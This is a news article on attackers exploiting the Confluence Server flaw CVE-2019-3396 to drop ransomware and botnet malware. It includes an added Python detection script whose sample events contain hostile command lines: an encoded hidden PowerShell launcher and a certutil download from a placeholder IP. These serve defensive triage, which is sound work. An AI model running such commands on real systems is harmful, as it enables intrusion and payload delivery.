Intruders found a vulnerability in Atlassian Confluence Server that lets them load malware

Cybercriminals are actively exploiting a critical vulnerability in Atlassian Confluence Server to remotely compromise Linux and Windows servers.

The intruders install the GandCrab ransomware and the Dofloo malware (also known as AES.DDoS and Mr. Black) on compromised servers.

The problem is a server-side template injection in the Widget Connector (CVE-2019-3396) that allows a remote attacker to perform path traversal and execute arbitrary code on instances of Confluence Server and Data Center.

Augusto Remillano II, a security specialist at Trend Micro, reports:

"This malware variant can perform DDoS attacks, remote code execution, and cryptocurrency mining on systems that run vulnerable versions of Confluence Server and Data Center. Atlassian already took steps to fix these issues and recommended that users upgrade to the latest version (6.15.1)."

Several exploits for the vulnerability are already circulating. The first appeared on April 10, and cybercriminals immediately added it to their arsenal: mass scanning began for vulnerable Confluence Server and Data Center instances, with the aim of infecting them with the GandCrab ransomware.

After compromising a server, the intruders download the PowerShell Empire post-exploitation toolkit to the controlled machine and use it to retrieve an archived GandCrab payload. According to Alert Logic specialists, the CertUtil LOLBin (a living-off-the-land binary, i.e. a signed Windows tool abused as a downloader) is used to bypass security controls.
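The chain described above (a Confluence process spawning a shell, an encoded PowerShell launcher, certutil fetching a payload from a URL) leaves a recognisable trail in process-creation telemetry. The following triage script is an example added by the editor, not code from Trend Micro, Alert Logic or Atlassian. It assumes a flattened (parent image, image, command line) event shape such as a Sysmon Event ID 1 or EDR export would give, and the list of Tomcat/Java image names under which Confluence runs on Windows is an assumption to adjust to your own install; the sample events are constructed, not real telemetry.

```python
"""Triage Windows process-creation events for the post-exploitation chain
seen after CVE-2019-3396 compromises: web-server process spawning a shell,
encoded PowerShell, and certutil abused as a downloader (LOLBin).
Added example code; assumptions are marked in comments."""
import re
from typing import Iterable, List, Tuple

Event = Tuple[str, str, str]  # (parent image, image, command line)

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS: List[Event] = [
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ("tomcat9.exe", "cmd.exe",
     'cmd.exe /c "powershell -nop -w hidden -enc SQBFAFgA..."'),
    ("cmd.exe", "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgA..."),
    ("powershell.exe", "certutil.exe",
     "certutil.exe -urlcache -split -f http://203.0.113.10/update.bin "
     "C:\\Windows\\Temp\\update.bin"),
    ("explorer.exe", "certutil.exe", "certutil.exe -verify cert.cer"),
    ("java.exe", "whoami.exe", "whoami"),
]

# Assumption: image names under which Confluence/Tomcat runs on a Windows host.
WEB_SERVER_PARENTS = {"java.exe", "javaw.exe", "tomcat8.exe", "tomcat9.exe"}
# Children a web application server has no business launching.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe",
                       "certutil.exe", "bitsadmin.exe"}

# certutil used as a downloader: -urlcache together with -f and a URL.
CERTUTIL_FETCH = re.compile(r"-urlcache\b.*-f\s+(?:https?|ftp)://", re.I)
# PowerShell launched with a base64 encoded command (-e/-ec/-enc/-EncodedCommand).
ENCODED_PS = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I)


def classify(parent: str, image: str, cmdline: str) -> List[str]:
    """Return the detection names that fire for one event (empty if benign)."""
    findings: List[str] = []
    p, i = parent.lower(), image.lower()
    if p in WEB_SERVER_PARENTS and i in SUSPICIOUS_CHILDREN:
        findings.append("web-process-spawned-shell")
    if i == "certutil.exe" and CERTUTIL_FETCH.search(cmdline):
        findings.append("certutil-download")
    if (i in {"powershell.exe", "pwsh.exe"} or "powershell" in cmdline.lower()) \
            and ENCODED_PS.search(cmdline):
        findings.append("encoded-powershell")
    return findings


def triage(events: Iterable[Event]) -> List[Tuple[int, List[str]]]:
    """Return (event index, findings) for every event that triggers a detection."""
    hits = []
    for idx, (parent, image, cmdline) in enumerate(events):
        found = classify(parent, image, cmdline)
        if found:
            hits.append((idx, found))
    return hits


if __name__ == "__main__":
    for idx, found in triage(SAMPLE_EVENTS):
        parent, image, cmdline = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {parent} -> {image}: {', '.join(found)}\n      {cmdline}")
```

The parent-child rule is the strongest of the three signals: a `java.exe`/Tomcat process spawning `cmd.exe`, `whoami.exe` or `certutil.exe` is rare in normal operation and is exactly what web-application RCE produces, whereas `certutil -verify` or `-hashfile` from an admin's session is legitimate and stays silent.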

Trend Micro report on Twitter

Through the same vulnerability, CVE-2019-3396, the intruders also install the Dofloo malware. It herds large numbers of compromised servers into botnets for DDoS attacks (using SYN, LSYN, UDP, UDPS and TCP floods) and for cryptocurrency mining.

Augusto Remillano II of Trend Micro gave the following advice:

Continuous monitoring in software development should be practiced in order to flag security risks in servers, data centers, and other computing environments. Since the successful exploitation of CVE-2019-3396 in Atlassian Confluence Server can put resources at risk, enterprises should be able to identify vulnerabilities, make use of the latest threat intelligence against malware or exploits, and detect modifications to the application’s design and the underlying infrastructure that hosts it.
